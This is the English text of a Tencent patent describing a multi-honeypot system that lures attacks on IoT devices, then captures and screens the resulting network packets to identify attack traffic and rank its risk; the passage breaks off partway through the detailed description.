CN114765553B

CN114765553B - Security management method, device, computer equipment and storage medium for access data

Info

Publication number: CN114765553B
Application number: CN202110032177.XA
Authority: CN
Inventors: 李伟; 赵天星; 韩景维; 张洪睿; 张瑜龙
Original assignee: Tencent Technology Shenzhen Co Ltd
Current assignee: Tencent Technology Shenzhen Co Ltd
Priority date: 2021-01-11
Filing date: 2021-01-11
Publication date: 2024-04-30
Anticipated expiration: 2041-01-11
Also published as: CN114765553A

Abstract

The embodiment of the application relates to the technical field of clouds, and provides a security management method, a security management device, computer equipment and a storage medium for access data, which can identify and process the attack behaviors of visitors, in particular, can acquire access data packets received by at least one induction server in an attack induction system, wherein the attack induction system comprises at least two attack induction subsystems; determining a screening sequence and a screening rule of each attack induction subsystem according to the attack induction capability of the attack induction subsystem; determining an attack data packet in the access data packets of the attack induction subsystem based on the screening sequence and the screening rule; based on the determined attack danger of the attack data packet to the attack induction system, the attack data packet is processed, so that different attack induction subsystems can attract more abundant attack behaviors, and based on a plurality of attack induction subsystems, an attack induction system with strong capturing capability can be formed, and the recognition range and recognition capability of attack data are improved.

Description

Security management method, device, computer equipment and storage medium for access data

Technical Field

The embodiment of the application relates to the field of cloud technology, in particular to a security management method, a security management device, computer equipment and a storage medium for access data.

Background

In the related technology, honeypots can be deployed in a network to trap the attack behaviors aiming at the network, but in some technical fields, the number and types of the client devices involved are more, for example, in the technical field of the Internet of things, based on the characteristic of the large number of objects in the Internet of things, the Internet of things has a plurality of types of client devices which are more in number and can be attacked by attackers.

Therefore, for the security of systems with a large number and types of client devices, it is necessary to provide a solution that can analyze and process multiple attacks under such systems, so as to improve the security of the system.

Disclosure of Invention

The embodiment of the application provides a security management method, a security management device, computer equipment and a storage medium for access data, which can effectively detect various attacks possibly occurring in a system with a plurality of client equipment numbers and types and is beneficial to improving the security of the system.

In order to solve the above technical problems, an embodiment of the present application provides a method for security management of access data, including:

the method comprises the steps of obtaining access data packets received by at least one induction server in an attack induction system, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;

according to the attack induction capability of the attack induction subsystem, determining the screening sequence and screening rule of the attack data packet of each attack induction subsystem;

Determining a currently screened attack induction subsystem based on the screening sequence of each attack induction subsystem;

If the currently screened attack induction subsystem is arranged at the forefront position in the screening sequence, determining an attack data packet in the access data packet based on a screening rule corresponding to the currently screened attack induction subsystem and the access data packet received by the currently screened attack induction subsystem;

If the currently screened attack induction subsystem is not arranged at the forefront position in the screening sequence, acquiring a sending user of screened attack data packets based on a screening result of the screened attack induction subsystem, determining the access data packets sent by the sending user as attack data packets from access data packets received by the currently screened attack induction subsystem, and determining attack data packets in the unselected access data packets based on screening rules corresponding to the currently screened attack induction subsystem and the unselected access data packets of the currently screened attack induction subsystem;

and processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.

In order to solve the above technical problem, an embodiment of the present application further provides a security management device for accessing data, where the device includes:

The system comprises a data packet acquisition unit, a data packet generation unit and a data packet generation unit, wherein the data packet acquisition unit is used for acquiring access data packets received by at least one induction server in an attack induction system, the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;

the screening scheme determining unit is used for determining screening sequences and screening rules of attack data packets of each attack induction subsystem according to the attack induction capacity of the attack induction subsystem;

a screening object determining unit, configured to determine a currently screened attack induction subsystem based on a screening order of each attack induction subsystem;

The first screening unit is used for determining an attack data packet in the access data packet based on a screening rule corresponding to the currently screened attack induction subsystem and the access data packet received by the currently screened attack induction subsystem if the currently screened attack induction subsystem is arranged at the forefront position in the screening sequence;

A second screening unit, configured to, if the currently screened attack-inducing subsystem is not arranged at a position that is the most forward in the screening sequence, obtain a sending user of the screened attack data packet based on a screening result of the screened attack-inducing subsystem, determine, from the access data packets received by the currently screened attack-inducing subsystem, that the access data packet sent by the sending user is an attack data packet, and determine, based on a screening rule corresponding to the currently screened attack-inducing subsystem and an unselected access data packet of the currently screened attack-inducing subsystem, an attack data packet in the unselected access data packet;

and the processing unit is used for processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.

In an alternative example, the security management apparatus for accessing data further includes a deployment unit for:

Before a data packet acquisition unit acquires an access data packet received by at least one induction server in an attack induction system, acquiring a system deployment file of an attack induction subsystem in the attack induction system;

Based on a deployment mode and a system deployment file corresponding to the attack induction subsystem, deploying a server induction device of the attack induction subsystem in a public network, and deploying an induction client device of the attack induction subsystem in a corresponding client end network, wherein the server induction device comprises an induction server.

In an alternative example, the attack-inducing subsystem includes at least two associated attack-inducing subsystems that share a first induction server;

A deployment unit for:

based on the deployment mode of at least one associated attack induction subsystem and a system deployment file, deploying the first induction server in a public network;

According to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying other server induction devices except the first induction server in the server induction devices of the associated attack induction subsystems;

and deploying the induction client equipment of each associated attack induction subsystem in the corresponding client end deployment network according to the deployment mode of each associated attack induction subsystem and the system deployment file.

In an alternative example, the association attack-inducing subsystem includes a first attack-inducing subsystem, a deployment unit configured to:

simulating induction client equipment to be set in the first attack induction subsystem in the public network according to a deployment mode and a system deployment file of the first attack induction subsystem;

And simulating a first target protocol required to run the service provided by the client-side induction equipment in the public network.

In an alternative example, the association attack-inducing subsystem includes a second attack-inducing subsystem, a deployment unit configured to:

Acquiring intranet access information of entity client equipment connected in a target intranet according to a deployment mode and a system deployment file of the second attack induction subsystem;

And determining the entity client equipment as the induction client equipment of the second attack induction subsystem, acquiring public network access information obtained after the internal network access information of the entity client equipment is mapped to a public network, and storing the public network access information in the first induction server.

In an alternative example, the attack-inducing subsystem includes a third attack-inducing subsystem, a deployment unit configured to:

Based on the deployment mode and the system deployment file of the third attack induction subsystem, deploying a server induction device based on a target Internet of things protocol in the public network;

Simulating an Internet of things protocol client device based on the target Internet of things protocol in a target intranet to obtain an induction client device of the third attack induction subsystem;

and simulating the operation of the application program of the internet of things protocol client device in the target intranet so as to simulate the operation of the internet of things protocol client device.

In an alternative example, the first screening unit is configured to:

Obtaining a corresponding analysis data packet for the access data packet received by the currently screened attack induction subsystem;

acquiring access behavior characteristic information corresponding to the analysis data packet, and determining suspicious analysis data packets in the analysis data packet based on the access behavior characteristic information;

And carrying out feature matching on the suspicious analysis data packet based on attack characteristic information of the attack data packet preset in a screening rule corresponding to the currently screened attack induction subsystem, and determining the attack data packet in the access data packet based on a matching result.

In an alternative example, the first screening unit is configured to:

acquiring a protocol used by the analysis data packet based on the data of the analysis data packet;

Based on the data of the analysis data packet, access characteristics of a sending user of the analysis data packet are obtained;

If the protocol of the analysis data packet is a preset protocol in the screening rule corresponding to the currently screened attack induction subsystem, and/or the corresponding access characteristic accords with the specific access characteristic of the preset suspicious user in the screening rule corresponding to the currently screened attack induction subsystem, determining that the analysis data packet is a suspicious analysis data packet.

In an alternative example, the first screening unit is configured to:

performing keyword matching on the suspicious analysis data packet based on the preset attack data packet keywords in the screening rules corresponding to the currently screened attack induction subsystem;

determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet;

and determining an attack data packet in the access data packet based on the high-suspicious analysis data packet.

In an alternative example, the screening unit is configured to:

If the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rules corresponding to the currently screened attack induction subsystem; and/or, the association content associated with the internet of things protocol in the high-suspicious analysis data packet has the attack characteristics aiming at the internet of things protocol in the screening rule corresponding to the currently screened attack induction subsystem; and/or, the data of the high-suspicious analytic data packet has the attack characteristics of preset attack network technologies in the screening rules corresponding to the currently screened attack induction subsystem;

and determining the access data packet corresponding to the high-suspicious analysis data packet as an attack data packet.

In an alternative example, the processing unit is configured to:

according to the information of the sending user of the attack data packet, determining the attack data packet of the same sending user aiming at all attack induction subsystems as the user associated attack data packet of the sending user;

Determining the attack risk of the user associated attack data packets of the same transmitting user according to the number of the user associated attack data packets of the same transmitting user, the number of the attack induction subsystems attacked by the user associated attack data packets, the attack induction capacity and the screening rules of the user associated attack data packets;

according to the attack risk of the user associated attack data packet of the same transmitting user, processing the user associated attack data packet according to a processing mode corresponding to the attack risk;

in an alternative example, further comprising: a statistics unit for:

Based on the data in the analysis data packet of the attack data packet, acquiring the statistical information of the attack data packet on at least one abnormal traffic statistical dimension;

and generating an abnormal flow statistical report based on the statistical information.

In an alternative example, the security management apparatus for accessing data further includes: and the information sending unit is used for sending the abnormal flow statistical report to the management terminal when receiving an abnormal flow checking instruction sent by the management terminal after the processing unit generates the abnormal flow statistical report based on the statistical information, so that the management terminal can display an abnormal flow checking page based on the abnormal flow statistical report.

In some embodiments of the present invention, a computer device may also be provided, comprising a memory, a processor and a computer program stored on the memory and executable on the processor, wherein the processor implements the steps of the method as described above when executing the computer program.

In some embodiments of the invention, a storage medium may also be provided, on which a computer program is stored which, when run on a computer, causes the computer to perform the steps of the method as described above.

By adopting the scheme provided by the embodiment of the application, the access data packet received by at least one induction server in the attack induction system can be obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server; determining a screening sequence and a screening rule of each attack induction subsystem according to the attack induction capability of the attack induction subsystem; screening the data packets of the attack induction subsystem based on the screening sequence and the screening rule to determine attack data packets; based on the determined attack danger of the attack data packet to the attack induction system, the attack data packet is processed, so that different attack induction subsystems can attract more kinds of attack behaviors, an induction server in the attack induction system can receive more attack data packets, and the attack data packets are detected pertinently through an attack data packet screening scheme corresponding to each attack induction subsystem, so that a detection result with higher accuracy is obtained, more equipment vulnerabilities can be found, and the industry safety of systems with various kinds and numbers of client equipment is improved.

Drawings

FIG. 1 is a schematic diagram of a network architecture for implementing the present embodiment in accordance with an embodiment of the present application;

FIG. 2a is a flow chart of a method for securely managing access to data according to an embodiment of the present application;

FIG. 2b is a schematic diagram illustrating a configuration of a security management system for accessing data according to an embodiment of the present application;

FIG. 2c is a schematic diagram of another configuration of a security management system for accessing data according to an embodiment of the present application;

FIG. 2d is a schematic diagram illustrating the screening of an attack packet according to an embodiment of the present application;

FIG. 3 is a detailed flowchart of a method for security management of access data according to an embodiment of the present application;

FIG. 4 is a schematic diagram of a configuration of a security management device for accessing data according to an embodiment of the present application;

fig. 5 is a schematic diagram of a computer device according to an embodiment of the present application.

Detailed Description

The terms first, second and the like in the description and in the claims of embodiments of the application and in the above-described figures are used for distinguishing between similar objects and not necessarily for describing a particular sequential or chronological order. It is to be understood that the data so used may be interchanged where appropriate such that the embodiments described herein may be implemented in other sequences than those illustrated or otherwise described herein. Furthermore, the terms "comprises," "comprising," and any variations thereof, are intended to cover a non-exclusive inclusion, such that a process, method, system, article, or apparatus that comprises a list of steps or modules is not necessarily limited to those explicitly listed but may include other steps or modules not expressly listed or inherent to such process, method, article, or apparatus, such that the partitioning of modules by embodiments of the application is only one logical partitioning, may be implemented with additional partitioning, such as a plurality of modules may be combined or integrated in another system, or some features may be omitted, or not implemented, and further, such that the coupling or direct coupling or communication connection between modules may be via some interfaces, indirect coupling or communication connection between modules may be electrical or otherwise similar, none of which are limited in embodiments of the application. The modules or sub-modules described as separate components may or may not be physically separate, may or may not be physical modules, or may be distributed in a plurality of circuit modules, and some or all of the modules may be selected according to actual needs to achieve the purposes of the embodiment of the present application.

The embodiment of the application provides a security management method, a device, computer equipment and a storage medium for access data.

In this embodiment, the computer device may be a terminal or a server, and the terminal may include a mobile terminal and a fixed terminal. The mobile terminal comprises, but is not limited to, a smart phone, a tablet computer, a notebook computer, an intelligent vehicle-mounted terminal and the like capable of running an online education course application, wherein the fixed terminal comprises, but is not limited to, a desktop computer, an intelligent television and the like.

The server may be an independent physical server, a server cluster or a distributed system formed by a plurality of physical servers, or a cloud server providing cloud services, cloud databases, cloud computing, cloud functions, cloud storage, network services, cloud communication, middleware services, domain name services, security services, CDNs, basic cloud computing services such as big data and artificial intelligence platforms, but is not limited thereto.

Referring to fig. 1, fig. 1 illustrates a security management system for access data of the present embodiment, where the security management system for access data may include an attack induction system 10 and a laboratory server 20, where the attack induction system 10 includes at least two attack induction subsystems 11, each attack induction subsystem 11 includes at least one induction client device (not shown in fig. 1) and an induction server 111 having a capability of accessing the induction client device, and optionally, the deployment manners of the induction client devices in different attack induction subsystems may be different.

Wherein laboratory servers 20 and each induction server 111 are connected via a network, such as a wireless network.

The induction server 111 of the present embodiment may receive an access packet from an access device, store the access packet, and transmit the stored access packet to the laboratory server 20 upon receiving a packet acquisition request of the laboratory server 20.

A laboratory server 20, configured to obtain access data packets received by at least one induction server in an attack induction system, where the attack induction system includes at least two attack induction subsystems, each attack induction subsystem including an induction server and at least one induction client device connected to the induction server; according to the attack induction capability of the attack induction subsystem, determining the screening sequence and screening rule of the attack data packet of each attack induction subsystem; determining a currently screened attack induction subsystem based on the screening sequence of each attack induction subsystem; if the currently screened attack induction subsystem is arranged at the forefront position in the screening sequence, determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack induction subsystem and the access data packet received by the currently screened attack induction subsystem; if the currently screened attack induction subsystem is not arranged at the forefront position in the screening sequence, acquiring a sending user of the screened attack data packet based on the screening result of the screened attack induction subsystem, determining the access data packet sent by the sending user as the attack data packet from the access data packet received by the currently screened attack induction subsystem, and determining the attack data packet in the non-screened access data packet based on the screening rule corresponding to the currently screened attack induction subsystem and the non-screened access data packet of the currently screened attack induction subsystem; and processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.

The embodiment of the application provides a security management method for access data, which can be executed by a processor of computer equipment.

Referring to fig. 2a, the security management method of access data may include:

201. The method comprises the steps that access data packets received by at least one induction server in an attack induction system are obtained, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;

in this embodiment, the induction server in the attack induction subsystem has the capability to access the induction client device in the same attack induction subsystem.

In one example, the deployment of different attack-inducing subsystems, and the deployment of inducing client devices in the subsystems, may be different. The deployment mode of the embodiment may include a honeypot technology used when the attack-induced subsystem is deployed, and a setting mode of inducing the client device to be set in the subsystem. The honeypot technology is different, the deployment modes are different, and the deployment modes of the entity induction client equipment and the virtual induction client equipment are also different.

The attack-inducing subsystem in this embodiment is a system that mimics the structure and functional structure of a specific system, and its important function is to attract and capture attack data packets that attack the specific system, where the structure and composition of the attack-inducing subsystem are determined by the structure and composition of the specific system, and in one example, the system that the attack-inducing subsystem mimics may include an internet system, an internet of things system, and so on.

For example, in one example, the attack-inducing subsystem may be a disguised internet of things system built based on internet of things characteristics that includes a server-side inducing device and an inducing client device.

In an attack-inducing subsystem, the server-side-inducing device may include a device required by a server in a real internet of things system, such as a server, a switch, and the like.

In one attack-inducing subsystem, the client devices disguised by the inducing client devices may include devices located at the client in a real internet of things system, such as routers, smart televisions, cameras, smart refrigerators, and so on.

Of course, it is understood that in the same attack-inducing subsystem, the server-side inducing device may access the inducing client device.

The attack induction subsystem in this embodiment may be implemented based on a honeypot technology in the related art, and each attack induction subsystem may be regarded as a honeypot constructed based on characteristics of the internet of things, and the attack induction system in this embodiment may be regarded as a honeypot system formed by a plurality of honeypots.

The honeypot is a network security active defense platform for simulating the real network environment, the real application program and the real business logic of an enterprise and providing approximate actual combat. The method has the advantages that targets for people to attack can be provided through holes and the like, the hacker is attracted to attack in advance, and the function of cheating and delaying the hacker is achieved, so that the identification and collection of the attack behaviors of the hacker can be achieved, the attack behaviors in the field of the Internet of things can be found when the method is applied to the field of the Internet of things, holes of more unknown devices are found, targeted protection measures are facilitated to be deployed in the actual Internet of things, and the defensive and security of the Internet of things are improved.

In this embodiment, types of honeypots include, but are not limited to, low interaction honeypots, medium interaction honeypots, and high interaction honeypots.

The biggest characteristic of the low-interaction honeypot is simulation, and all attack weaknesses and attack objects displayed by the honeypot for an attacker are not real product systems, but simulation of various systems and services provided by the systems. Since its services are all simulated actions, the honeypot has very limited information available, and can only respond simply to an attacker, which is the safest type of honeypot.

The interactive honeypot is a simulation of various behaviors of a real operating system, provides more interactive information, and can obtain more information from the behaviors of an attacker. In this behavior-simulating system, the honeypot may look indistinguishable from a real operating system. They are targets of attacks that a real system is also tempting to.

The high-interaction honeypot has a real operating system, and the advantages of the high-interaction honeypot are that the real operating system is provided for an attacker, and when the attacker obtains the ROOT authority, the attacker is confused by the system and the authenticity of the data, and more activities and behaviors of the attacker are recorded. Of course, the disadvantage is that the possibility of being invaded is high, and if the whole high-interaction honeypot is invaded, it becomes a springboard for the attacker to attack next.

In this embodiment, the attack-inducing subsystem may be set based on the above-mentioned honeypot technology, and it may be understood that different attack-inducing subsystems may be set using the same type of honeypot technology, for example, both attack-inducing subsystems are low-interaction honeypots, but deployment modes of the client-side devices induced in the two attack-inducing subsystems are different.

In this embodiment, the induction server may implement deployment based on Cloud technology (Cloud technology). Deployment is implemented, for example, based on cloud computing (cloud computing), cloud storage (cloud storage), and the like in cloud technology.

The cloud technology is firstly explained, and can form a resource pool based on the general terms of network technology, information technology, integration technology, management platform technology, application technology and the like applied by the cloud computing business mode, so that the cloud technology is flexible and convenient as required. Cloud computing technology will become an important support. Background services of technical networking systems require a large amount of computing, storage resources, such as video websites, picture-like websites, and more portals. Along with the high development and application of the internet industry, each article possibly has an own identification mark in the future, the identification mark needs to be transmitted to a background system for logic processing, data with different levels can be processed separately, and various industry data needs strong system rear shield support and can be realized only through cloud computing.

In view of the fact that many hacking attacks adopt a mode of continuously sending attack data packets, the quantity of the data packets received by the induction server is generally large, and the cloud technology can provide computing capacity for the induction server well.

Cloud computing refers to a delivery and use mode of an IT infrastructure, namely that required resources are obtained in an on-demand and easily-expandable manner through a network; generalized cloud computing refers to the delivery and usage patterns of services, meaning that the required services are obtained in an on-demand, easily scalable manner over a network. Such services may be IT, software, internet related, or other services. In this embodiment, the cloud computing service may provide cloud server resources required for deploying the induction server for the present embodiment, and it may be understood that in the attack induction subsystem implemented by adopting different honeypot technologies, the resource size required by the induction server may be different, for example, the required server port, the protocol that needs to be operated may be different, and the service provided for the client may be different, so that the present embodiment implements the induction server by adopting the cloud server, and may implement effective utilization of the cloud server resources, thereby avoiding waste of server resources.

Cloud storage is a new concept which extends and develops in the concept of cloud computing, and a distributed cloud storage system (hereinafter referred to as a storage system for short) refers to a storage system which integrates a large number of storage devices (storage devices are also called storage nodes) of different types in a network through application software or application interfaces to cooperatively work and jointly provides data storage and service access functions for the outside through functions such as cluster application, grid technology, a distributed storage file system and the like. For example, the server stores electronic maps, space units, user data, and the like.

In this embodiment, the access data packet received by the induction server may be stored in a corresponding cloud database based on a cloud storage technology.

The induction server in this embodiment may be a server deployed on a public network, and the deployment network of the induction client device is not limited, and may be deployed on the public network or in some internal networks as required.

In order to facilitate understanding of the solution of the present embodiment, a deployment solution of the attack-inducing system in the present embodiment will be described herein.

In this embodiment, before step 201, the attack induction system may be deployed, and optionally, the scheme for deploying the attack induction system may include:

acquiring a system deployment file of an attack induction subsystem in the attack induction system;

And deploying the server side induction equipment of the attack induction subsystem in the public network based on the deployment mode and the system deployment file corresponding to the attack induction subsystem, and deploying the induction client side equipment of the attack induction subsystem in the corresponding client side end deployment network, wherein the server side induction equipment comprises an induction server.

The system deployment file of each attack induction subsystem may include a system deployment file of a server side and a system deployment file of a client side.

It may be appreciated that the configuration information of the server side induction device may be included in the system deployment file of the server side, for example, a simulation program of the server side induction device, and the like. Of course, in different attack-inducing subsystems, the system deployment files of the server may be different.

In general, the system deployment files of clients are typically different in different attack-inducing subsystems.

In this embodiment, the server side induction device of the attack induction subsystem may be deployed based on the deployment mode and the system deployment file of the server side, and then, based on the system deployment file of the client side, the corresponding induction client device is deployed on the basis that the server side induction device has been deployed.

For example, on the basis that the server side induction device is deployed, based on the protocol and the algorithm port of the induction server, the server port used by each induction client side device in the same attack induction subsystem is determined, and based on the server port, the deployment mode and the system deployment file of the client side, the corresponding induction client side device is deployed.

In one example, a different induction server may be deployed in each attack induction subsystem, and the deployment sequence of the different induction servers is not limited in the deployment process of the attack induction subsystem.

In one example, the deployment process of the attack induction subsystem can be accelerated and resources can be saved by a mode that a plurality of attack induction subsystems share an induction server.

Optionally, in one example, the attack-inducing subsystem includes at least two associated attack-inducing subsystems that share a first induction server; the step of deploying a service end induction device of the attack induction subsystem in the public network and deploying an induction client device of the attack induction subsystem in the corresponding client end network based on a deployment mode and a system deployment file corresponding to the attack induction subsystem may include:

deploying a first induction server in the public network based on the deployment mode of at least one associated attack induction subsystem and the system deployment file;

According to the deployment mode of each associated attack induction subsystem and the system deployment file, deploying other server induction devices except the first induction server in the server induction devices of the associated attack induction subsystems;

In this embodiment, in the association attack induction subsystem, the system deployment files of the server may be identical, or at least the deployment files of the first induction server may be identical.

In this embodiment, the first induction server may be implemented based on a low-interaction honeypot technology or a medium-interaction honeypot technology, which is not limited in this embodiment.

In one example, the deployment order of the two association attack induction subsystems is not limited, and may be set according to needs, and the server induction devices to be deployed in the two association attack induction subsystems may not be identical.

For example, one of the associated attack-inducing subsystems may be a low-interaction honeypot and the other associated attack-inducing subsystem may be a real device honeypot (i.e., server-side inducing device based on an entity device implementation) implemented by an inducing server (or server-side inducing device) that multiplexes the low-interaction honeypot

Optionally, in one example, the association attack induction subsystem includes a first attack induction subsystem, and the step of deploying induction client devices of each association attack induction subsystem in a corresponding client end network according to a deployment manner of each association attack induction subsystem and a system deployment file may include:

simulating induction client equipment to be set in the first attack induction subsystem in the public network according to the deployment mode of the first attack induction subsystem and the system deployment file;

and simulating a first target protocol required to induce services provided by the client device in the public network.

In this example, the induction server and the induction client device are both in the public network, so that a user in the public network can access the induction client device through the induction server, and the induction server can acquire and store an access data packet of the user.

Wherein the first target protocol includes, but is not limited to: http (Hyper Text Transfer Protocol ), ssh (Secure Shell Protocol), telnet Protocol, sip (Session Initiation Protocol ), ftp (FILE TRANSFER Protocol, file transfer Protocol), and the like.

Wherein different protocols may be used to simulate different services provided by the client device, e.g., simulate user web login services using simulated http, simulate user command line login services using simulated ssh, simulate user command line login services using simulated telnet, etc.

It will be appreciated that the protocols required to simulate different client devices may be different, for example, referring to fig. 2b, the external network server 1 is an induction server of this embodiment, corresponding to the external network server 1, on the same public network, there are deployed client devices such as a camera, an internet phone and a router, where the first target protocols corresponding to the camera include http and telnet protocols, and the first target protocols corresponding to the internet phone include http and voip (Voice over Internet Protocol, voice communication over IP network) protocols.

In one example, the step of deploying the client device for each associated attack-inducing subsystem in the corresponding client deployment network according to the deployment manner of each associated attack-inducing subsystem and the system deployment file may further include:

Simulating induction client equipment to be set in the first attack induction subsystem in a target intranet according to a deployment mode and a system deployment file of the first attack induction subsystem; and simulating a first target protocol required to induce services provided by the client device in the target intranet;

And exposing intranet access information of the induction client device in the target intranet in the public network, so that a public network user can access the induction client device through the first attack server.

In one example, the induction client device includes a router having a public network IP address on a public network.

Among these, the above-described modes of exposure include, but are not limited to, intranet penetration.

Optionally, the step of exposing intranet access information of the client device in the target intranet to the public network may include: and determining the entity client equipment as the induction client equipment of the second attack induction subsystem, acquiring public network access information obtained after the internal network access information of the entity client equipment is mapped to a public network, and storing the public network access information in the first induction server.

For example, a first access information mapping table (such as a NAT mapping table) of the client device may be set, where the first access information mapping table is stored in a network device, such as a router, to which the client device is connected, where the mapping table includes intranet access information (such as an intranet IP address and port information) of the client device in the target intranet in the first attack-inducing subsystem, and public network access information obtained after mapping the intranet access information to a public network, where the public network access information includes a public network IP address (typically a public network IP address of the router) and a port number, and the public network access information of the client device in the public network is sent to the first induction server for storage. An attack user in the public network can acquire public network access information of the induction client device in the public network through the first induction server, an access data packet is sent through the public network access information, after the first induction server receives the access data packet, the data packet is sent to a router of the induction client device based on the public network access information, and the router can send the access data packet to the induction client device in the target intranet based on the first access information mapping table, so that the authenticity of the first attack induction subsystem can be improved, and the possibility that the attack user discovers a honey pot is reduced.

Alternatively, in this embodiment, the client device may be configured by an entity device. The association attack induction subsystem includes a second attack induction subsystem, and the step of deploying induction client devices of each association attack induction subsystem in a corresponding client end network according to a deployment mode and a system deployment file of each association attack induction subsystem may include:

the entity client device is determined to be an induction client device of the second attack induction subsystem, and intranet access information of the entity client device is exposed in the public network.

Wherein the second attack-inducing subsystem is a real device honey pot, in one example the induction server of the second attack-inducing subsystem may be a different server than the first induction server.

Of course, multiplexing the first induction server can improve the resource utilization rate and the system deployment efficiency. Optionally, in this embodiment, intranet access information of the entity client device in the target intranet may be read from the system deployment file, where the intranet access information includes, but is not limited to, information such as an IP address of the entity client device in the target intranet.

The manner of exposing the intranet access information of the entity client device in the public network includes, but is not limited to, intranet penetration.

For example, the entity client device includes a terminal device and a network device used by a user, such as a gateway device, etc., a second access information mapping table (such as a NAT mapping table) may be set for the client device induced in the second attack induction subsystem, where the mapping table includes intranet access information (such as an intranet IP address and port information) of the client device induced in a target intranet, and the intranet access information maps to a public network IP address (typically a public network IP address of a router) and a port number obtained in a public network, and the second access information mapping table may be stored in the gateway device, and the public network IP address and the port number obtained by mapping of the client device induced are sent to the first induction server so as to be stored, so that intranet penetration is achieved.

In one example, a high interaction honeypot may also be built to enhance the trapping ability of the attack-inducing system to hackers.

Optionally, the attack-inducing subsystem includes a third attack-inducing subsystem, and the step of deploying, based on the deployment mode and the system deployment file corresponding to the attack-inducing subsystem, a server-side inducing device of the attack-inducing subsystem in the public network and an inducing client-side device of the attack-inducing subsystem in the corresponding client-side deploying network includes:

Deploying a service end induction device based on a target Internet of things protocol in a public network based on a deployment mode and a system deployment file of a third attack induction subsystem, wherein the service end induction device comprises a second induction server;

simulating an Internet of things protocol client device based on the target Internet of things protocol in the target intranet to obtain an induction client device of the third attack induction subsystem;

And simulating an application program of the Internet of things protocol client device to operate in the target intranet so as to simulate the operation of the Internet of things protocol client device.

In one example, the second inducement server is different from the first inducement server.

The target internet of things protocol can be any protocol used in the field of physical networks, including but not limited to MQTT (message queue telemetry transport) protocol.

The server side induction device of the third attack induction subsystem can be a server side deployed based on the MQTT protocol, and the induction server is MATT servers (see the MQTT server in the high-interaction honeypot in fig. 2 c).

The target intranet in this embodiment is not limited, and may be a laboratory intranet, and the client device of the third attack-inducing subsystem in this embodiment may include a plurality of MQTT clients.

In this embodiment, an application program (such as device firmware) that directly runs the internet of things protocol client device may be run through a simulator, such as a QEMU simulator, to simulate the device running, so as to simulate the device itself.

202. According to the attack induction capability of the attack induction subsystem, determining the screening sequence and screening rule of attack data of each attack induction subsystem;

In this embodiment, before step 201, the data in the induction server may be monitored all the time, where the monitoring manner includes, but is not limited to, running a monitoring command such as tcpdump related command on the induction server, performing data monitoring on a monitoring port of the induction server, and storing the monitored access data packet in a pcap file of the induction server, where the storing frequency is not limited, and for example, storing the access data packet once per hour, that is, acquiring the access data packet once per hour, into the pcap file. The pcap file may be stored in a cloud database corresponding to the induction server.

In step 201, a pcap file may be obtained from a cloud database to extract access data packets in the pcap file.

In this embodiment, the attack-inducing capability of the different attack-inducing subsystem is affected by the honeypot type of the attack-inducing subsystem, including the data of the inducing client device, and the like.

In one example, the attack inducement capability may be considered to be equivalent for all the attack inducement subsystems, and the screening order and the screening rule may be the same, i.e. the same screening rule may be used to screen the access data packets of all the inducement subsystems for attack data packets simultaneously. In this example, access packets from multiple induction servers may be stored together in a pcap file.

In one example, for different attack induction subsystems, the actual attack induction capability can be determined in a certain manner, and then different screening sequences can be adopted to screen the attack data packets. In this example, the pcap file may include a plurality of subfiles, each of which may store an access data package of the induction server.

In one example, after the server of the system where the security management device for accessing data obtains the access data packet from the pcap file, the access data packet may be parsed to obtain a parsed data packet, and the parsed data packet is stored in the database for use in subsequent screening of the attack data packet.

When the access data packet is analyzed, the access data packet can be split according to the data type, so that the analysis data packet is obtained.

The access data packet may be split according to ip address, port, access time, payload (payload), etc., and then stored in a database, for use in malicious traffic analysis (i.e., attack data packet analysis).

Alternatively, the number and content of screening rules for different attack-induction subsystems may be different. Screening rules refer to rules for determining attack data packets, the screening dimension of the screening rules is not limited, and the number of the screening rules is not limited.

203. Determining a currently screened attack induction subsystem based on the screening sequence of each attack induction subsystem;

the currently screened attack induction subsystem is the attack induction subsystem with the forefront screening sequence in the unselected attack induction subsystems in the attack induction subsystems.

It will be appreciated that the number of attack-inducing subsystems currently screened may be at least one.

204. If the currently screened attack induction subsystem is arranged at the forefront position in the screening sequence, determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack induction subsystem and the access data packet received by the currently screened attack induction subsystem;

In the example where the attack-inducing capabilities of the attack-inducing subsystems are considered to be the same, the currently screened attack-inducing subsystem is all the attack-inducing subsystems, and the analysis of the attack data packet with reference to fig. 2d can be roughly divided into four major steps: data screening, logic detection, fuzzy matching and accurate matching.

Optionally, in one example, the step of determining an attack data packet in the access data packet based on the screening rule corresponding to the currently screened attack-inducing subsystem and the access data packet received by the currently screened attack-inducing subsystem may include:

obtaining corresponding analysis data packets for all the access data packets received by the attack induction subsystem;

Acquiring access behavior characteristic information corresponding to the analysis data packet based on the data of the analysis data packet; determining suspicious analysis data packets in the analysis data packets based on the access behavior characteristic information and the screening rule of the access behavior dimension;

And carrying out attack characteristic matching on the suspicious analysis data packet based on attack characteristic information of the attack data packet preset in the screening rule, and determining the attack data packet in the access data packet based on a matching result.

The access behavior characteristic information may include, among other things, the type of protocol used and the access characteristics of the accessing party.

Alternatively, the parsed data packets may be obtained from a database. The filtering rules may include a protocol type preset for the suspicious parsed packet and access characteristics of the accessing party. One of the protocol types may be considered a screening rule, and one of the access features may be considered a screening rule.

The protocol type is used for carrying out a data screening step, and the access characteristic is used for carrying out a logic detection step.

Optionally, the step of acquiring access behavior feature information corresponding to the parsed data packet based on the parsed data packet; determining suspicious ones of the resolution packages based on the access behavior feature information and the screening rules for access behavior dimensions may include:

Acquiring a protocol used for analyzing the data packet based on the data of the analyzed data packet;

If the protocol of the analysis data packet is a preset protocol in the screening rule and/or the corresponding access characteristic accords with the specific access characteristic of the suspicious user preset in the screening rule, determining that the analysis data packet is the suspicious analysis data packet.

